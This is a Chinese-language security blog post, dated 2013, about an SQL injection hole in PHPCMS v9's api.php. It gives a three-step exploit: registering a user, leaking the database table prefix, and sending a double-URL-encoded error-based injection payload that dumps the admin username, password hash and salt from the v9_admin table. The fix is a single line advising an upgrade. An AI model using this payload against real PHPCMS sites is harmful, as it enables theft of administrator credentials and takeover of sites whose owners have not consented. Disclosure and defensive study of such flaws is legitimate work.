• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    phpcms v9最新爆管理密码漏洞及修复方案

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    漏洞形成原因就不多说了,文件在phpcms/api.php ,有兴趣的盆友可以多去挖一挖phpcms的洞子。

    主要利用过程:

    第一步:注册一个用户

    ?m=member&c=index&a=register&siteid=1

    第二步:访问api文件,爆出表前缀,默认的表前缀为v9

    ?op=add_favorite&url=wooyun.in&title=%2527

    第三步:爆出用户密码(下面红色的字体就是要修改的表前缀)

    ?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

     

    如图:


    本文地址:

    :修复方案只需要升级就可以,涛涛电脑知识网,涛涛电脑知识网, 官方已经连续两次升级,请及时补丁

  • 上一篇:86CMS储存型XSS
  • 下一篇:iis7.0命令行下列网站的物理目录
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1